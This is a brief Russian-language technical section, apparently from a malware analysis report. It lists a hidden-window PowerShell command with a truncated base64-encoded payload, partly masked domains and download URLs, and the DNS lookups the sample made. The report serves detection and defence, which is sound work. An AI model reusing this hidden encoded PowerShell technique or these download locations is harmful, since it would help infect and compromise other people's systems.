Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e LgAoACAAJABlAG4AVgA6AGMATwBNAFMAcABlAEMAWwA0ACwAMgA2ACwAMgA1AF0ALQBqAG8AaQBOACcAJwApACgAIAAoACgAKAAiAHsAMQA0ADAAfQB7ADEAOQB9AHsAMQAzADQAfQB7ADQANAB9AHsAMQAyADgAfQB7ADcANw...
- 'jc##eb.com':80
- 'jc##eb.com':443
- 'en#####deideias.com.br':80
- 'en#####deideias.com.br':443
- 'ho###eals.co.uk':80
- 'ho###eals.co.uk':443
- 'da##rdi.com':80
- 'hu###omains.com':443
- 'ni###coder.me':80
- http://jc##eb.com/lhsm4tt/
- http://www.jc##eb.com/lhsm4tt/
- http://en#####deideias.com.br/GgClcwx/
- http://ho###eals.co.uk/elqlzK2/
- http://da##rdi.com/IqN3J3Uea/
- http://ni###coder.me/tMwUlabc/
- 'jc##eb.com':443
- 'en#####deideias.com.br':443
- 'ho###eals.co.uk':443
- 'hu###omains.com':443
- DNS ASK jc##eb.com
- DNS ASK en#####deideias.com.br
- DNS ASK ho###eals.co.uk
- DNS ASK da##rdi.com
- DNS ASK hu###omains.com
- DNS ASK ni###coder.me
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e LgAoACAAJABlAG4AVgA6AGMATwBNAFMAcABlAEMAWwA0ACwAMgA2ACwAMgA1AF0ALQBqAG8AaQBOACcAJwApACgAIAAoACgAKAAiAHsAMQA0ADAAfQB7ADEAOQB9AHsAMQAzADQAfQB7ADQANAB9AHsAMQAyADgAfQB7ADcANw...' (со скрытым окном)